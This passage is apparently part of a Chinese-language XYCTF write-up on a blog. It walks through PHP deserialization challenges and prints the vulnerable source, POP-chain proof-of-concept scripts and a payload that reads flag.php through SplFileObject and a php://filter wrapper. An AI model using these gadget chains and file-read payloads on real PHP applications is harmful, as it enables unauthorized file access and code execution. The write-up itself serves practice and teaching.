class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">A</span> </span>&#123;<br><br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$mack</span>;<br><br> <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__invoke</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function"></span><br><span class="hljs-function"> </span>&#123;<br><br>  <span class="hljs-variable language_">$this</span>-&gt;mack-&gt;<span class="hljs-title function_ invoke__">nonExistentMethod</span>();<br><br> &#125;<br><br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">B</span> </span>&#123;<br><br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$luo</span>;<br><br> <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__get</span>(<span class="hljs-params"><span class="hljs-variable">$key</span></span>)</span>&#123;<br><br>  <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;o.O&lt;br&gt;&quot;</span>;<br><br>  <span class="hljs-variable">$function</span> = <span class="hljs-variable language_">$this</span>-&gt;luo;<br><br>  <span class="hljs-keyword">return</span> <span class="hljs-variable">$function</span>();<br><br> &#125;<br><br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">C</span> </span>&#123;<br><br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$wang1</span>;<br><br> <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__call</span>(<span class="hljs-params"><span class="hljs-variable">$wang1</span>,<span class="hljs-variable">$wang2</span></span>)</span><br><span class="hljs-function"></span><br><span class="hljs-function"> </span>&#123;<br><br>   <span class="hljs-keyword">include</span> <span class="hljs-string">&#x27;flag.php&#x27;</span>;<br><br>   <span class="hljs-keyword">echo</span> <span class="hljs-variable">$flag2</span>;<br><br> &#125;<br><br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">D</span> </span>&#123;<br><br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$lao</span>;<br><br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$chen</span>;<br><br> <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__toString</span>(<span class="hljs-params"></span>)</span>&#123;<br><br>  <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;O.o&lt;br&gt;&quot;</span>;<br><br>  <span class="hljs-keyword">return</span> <span class="hljs-title function_ invoke__">is_null</span>(<span class="hljs-variable">$this</span>-&gt;lao-&gt;chen) ? <span class="hljs-string">&quot;&quot;</span> : <span class="hljs-variable language_">$this</span>-&gt;lao-&gt;chen;<br><br> &#125;<br><br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">E</span> </span>&#123;<br><br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$name</span> = <span class="hljs-string">&quot;xxxxx&quot;</span>;<br><br> <span class="hljs-keyword">public</span> <span class="hljs-variable">$num</span>;<br><br> <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__unserialize</span>(<span class="hljs-params"><span class="hljs-variable">$data</span></span>)</span><br><span class="hljs-function"></span><br><span class="hljs-function"> </span>&#123;<br><br>  <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;br&gt;学到就是赚到!&lt;br&gt;&quot;</span>;<br><br>  <span class="hljs-keyword">echo</span> <span class="hljs-variable">$data</span>[<span class="hljs-string">&#x27;num&#x27;</span>];<br><br> &#125;<br><br> <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span>&#123;<br><br>  <span class="hljs-keyword">if</span>(<span class="hljs-variable language_">$this</span>-&gt;name!=<span class="hljs-string">&#x27;&#x27;</span> || <span class="hljs-variable language_">$this</span>-&gt;num!=<span class="hljs-string">&#x27;&#x27;</span>)&#123;<br><br>   <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;旅行者别忘记旅行的意义!&lt;br&gt;&quot;</span>;<br><br>  &#125;<br><br> &#125;<br><br>&#125;<br><br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;pop&#x27;</span>])) &#123;<br><br> <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;pop&#x27;</span>]);<br><br>&#125;<br></code></pre></td></tr></table></figure>

<p>构造poc</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">A</span> </span>&#123;<br><br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$mack</span>;<br><br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">B</span> </span>&#123;<br><br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$luo</span>;<br><br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">C</span> </span>&#123;<br><br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$wang1</span>;<br><br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">D</span> </span>&#123;<br><br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$lao</span>; <br><br>​    <span class="hljs-keyword">public</span> <span class="hljs-variable">$chen</span>;<br><br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">E</span> </span>&#123;<br><br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$name</span>=<span class="hljs-string">&quot;xxxxx&quot;</span>;<br><br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$num</span>;<br><br>&#125;<br><br><span class="hljs-variable">$a</span>=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">E</span>();<br><br><span class="hljs-variable">$a</span>-&gt;name=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">D</span>();<br><br><span class="hljs-variable">$a</span>-&gt;name-&gt;lao=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">B</span>();<br><br><span class="hljs-variable">$a</span>-&gt;name-&gt;lao-&gt;luo=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">A</span>();<br><br><span class="hljs-variable">$a</span>-&gt;name-&gt;lao-&gt;luo-&gt;mack=<span class="hljs-keyword">new</span> <span class="hljs-title function_ invoke__">C</span>();<br><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$a</span>);<br></code></pre></td></tr></table></figure>

<p>post得到</p>
<p>saber_master_saber_master.php  访问</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-comment">// flag.php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">XYCTFNO1</span></span><br><span class="hljs-class"></span>&#123;<br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$Liu</span>;<br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$T1ng</span>;<br>  <span class="hljs-keyword">private</span> <span class="hljs-variable">$upsw1ng</span>;<br>  <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$Liu</span>, <span class="hljs-variable">$T1ng</span>, <span class="hljs-variable">$upsw1ng</span> = Showmaker</span>)</span><br><span class="hljs-function">  </span>&#123;<br>​    <span class="hljs-variable language_">$this</span>-&gt;Liu = <span class="hljs-variable">$Liu</span>;<br>​    <span class="hljs-variable language_">$this</span>-&gt;T1ng = <span class="hljs-variable">$T1ng</span>;<br>​    <span class="hljs-variable language_">$this</span>-&gt;upsw1ng = <span class="hljs-variable">$upsw1ng</span>;<br>  &#125;<br> &#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">XYCTFNO2</span></span><br><span class="hljs-class"></span>&#123;<br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$crypto0</span>;<br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$adwa</span>;<br>  <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$crypto0</span>, <span class="hljs-variable">$adwa</span></span>)</span><br><span class="hljs-function">  </span>&#123;<br>​    <span class="hljs-variable language_">$this</span>-&gt;crypto0 = <span class="hljs-variable">$crypto0</span>;<br>  &#125;<br>  <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">XYCTF</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">  </span>&#123;<br>​    <span class="hljs-keyword">if</span> (<span class="hljs-variable language_">$this</span>-&gt;adwa-&gt;crypto0 != <span class="hljs-string">&#x27;dev1l&#x27;</span> <span class="hljs-keyword">or</span> <span class="hljs-variable language_">$this</span>-&gt;adwa-&gt;T1ng != <span class="hljs-string">&#x27;yuroandCMD258&#x27;</span>) &#123;<br>​      <span class="hljs-keyword">return</span> False;<br>​    &#125; <span class="hljs-keyword">else</span> &#123;<br>​      <span class="hljs-keyword">return</span> True;<br>​    &#125;<br>  &#125;<br>&#125;<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">XYCTFNO3</span></span><br><span class="hljs-class"></span>&#123;<br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$KickyMu</span>;<br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$fpclose</span>;<br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$N1ght</span> = <span class="hljs-string">&quot;Crypto0&quot;</span>;<br>  <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span>(<span class="hljs-params"><span class="hljs-variable">$KickyMu</span>, <span class="hljs-variable">$fpclose</span></span>)</span><br><span class="hljs-function">  </span>&#123;<br>​    <span class="hljs-variable language_">$this</span>-&gt;KickyMu = <span class="hljs-variable">$KickyMu</span>;<br>​    <span class="hljs-variable language_">$this</span>-&gt;fpclose = <span class="hljs-variable">$fpclose</span>;<br>  &#125;<br>  <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">XY</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function">  </span>&#123;<br>​    <span class="hljs-keyword">if</span> (<span class="hljs-variable language_">$this</span>-&gt;N1ght == <span class="hljs-string">&#x27;oSthing&#x27;</span>) &#123;<br>​      <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;WOW, You web is really good!!!\n&quot;</span>;<br>​      <span class="hljs-keyword">echo</span> <span class="hljs-keyword">new</span> <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;X&#x27;</span>](<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;Y&#x27;</span>]);<br>​    &#125;<br>  &#125;<br><br>  <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__wakeup</span>(<span class="hljs-params"></span>)</span><br><span class="hljs-function"></span><br><span class="hljs-function">  </span>&#123;<br><br>​    <span class="hljs-keyword">if</span> (<span class="hljs-variable language_">$this</span>-&gt;KickyMu-&gt;<span class="hljs-title function_ invoke__">XYCTF</span>()) &#123;<br><br>​      <span class="hljs-variable language_">$this</span>-&gt;<span class="hljs-title function_ invoke__">XY</span>();<br><br>​    &#125;<br><br>  &#125;<br><br>&#125;<br><br><span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;CTF&#x27;</span>])) &#123;<br><br>  <span class="hljs-title function_ invoke__">unserialize</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;CTF&#x27;</span>]);<br><br>&#125;<br></code></pre></td></tr></table></figure>

<p>构造poc</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">XYCTFNO1</span></span><br><span class="hljs-class"></span>&#123;<br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$Liu</span>;<br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$T1ng</span>;<br>  <span class="hljs-keyword">private</span> <span class="hljs-variable">$upsw1ng</span>;<br>&#125;<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">XYCTFNO2</span></span>&#123;<br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$crypto0</span>;<br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$adwa</span>;<br>&#125;<br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">XYCTFNO3</span></span>&#123;<br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$KickyMu</span>;<br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$fpclose</span>;<br>  <span class="hljs-keyword">public</span> <span class="hljs-variable">$N1ght</span> = <span class="hljs-string">&#x27;Crypto0&#x27;</span>;<br>&#125;<br><span class="hljs-variable">$a</span>=<span class="hljs-keyword">new</span> <span class="hljs-title class_">XYCTFNO3</span>();<br><br><span class="hljs-variable">$a</span>-&gt;N1ght=<span class="hljs-string">&#x27;oSthing&#x27;</span>;<br><br><span class="hljs-variable">$a</span>-&gt;KickyMu=<span class="hljs-keyword">new</span> <span class="hljs-title class_">XYCTFNO2</span>();<br><br><span class="hljs-variable">$a</span>-&gt;KickyMu-&gt;adwa=<span class="hljs-keyword">new</span> <span class="hljs-title class_">XYCTFNO1</span>();<br><br><span class="hljs-variable">$a</span>-&gt;KickyMu-&gt;adwa-&gt;T1ng=<span class="hljs-string">&#x27;yuroandCMD258&#x27;</span>;<br><br><span class="hljs-variable">$a</span>-&gt;KickyMu-&gt;adwa-&gt;crypto0=<span class="hljs-string">&#x27;dev1l&#x27;</span>;<br><br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">serialize</span>(<span class="hljs-variable">$a</span>);<br></code></pre></td></tr></table></figure>

<p>最终命令执行触发点</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"> <span class="hljs-keyword">echo</span> <span class="hljs-keyword">new</span> <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;X&#x27;</span>](<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;Y&#x27;</span>]);<br><span class="hljs-comment">//其中类名由POST请求中的&#x27;X&#x27;键提供，构造函数的参数由POST请求中的&#x27;Y&#x27;键提供。</span><br></code></pre></td></tr></table></figure>

<p>php原生类读文件 SplFileObject(默认读一行)<br> 所以要结合php伪协议读文件全部内容<br> <strong>X&#x3D;SplFileObject&amp;Y&#x3D;php:&#x2F;&#x2F;filter&#x2F;convert.base64-encode&#x2F;resource&#x3D;flag.php</strong><br>base64解码得flag</p>
<h2 id="ezPop"><a href="#ezPop" class="headerlink" title="ezPop"></a>ezPop</h2>
                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/kele6.github.io/categories/%E6%AF%94%E8%B5%9B/" class="category-chain-item">比赛</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>XYCTF</div>
      <div>https://junske51.github.io/kele6.github.io/2024/04/14/XYCTF/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>Author</div>
          <div>John Doe</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>Posted on</div>
          <div>April 14, 2024</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>Licensed under</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - Attribution">
                    <i class="iconfont icon-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/kele6.github.io/2024/04/15/xss/" title="xss">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">xss</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/kele6.github.io/2024/04/14/BUUCTF/" title="BUUCTF">
                        <span class="hidden-mobile">BUUCTF</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/kele6.github.io/js/events.js" ></script>
<script  src="/kele6.github.io/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/kele6.github.io/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/4.3.1/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/kele6.github.io/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/kele6.github.io/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
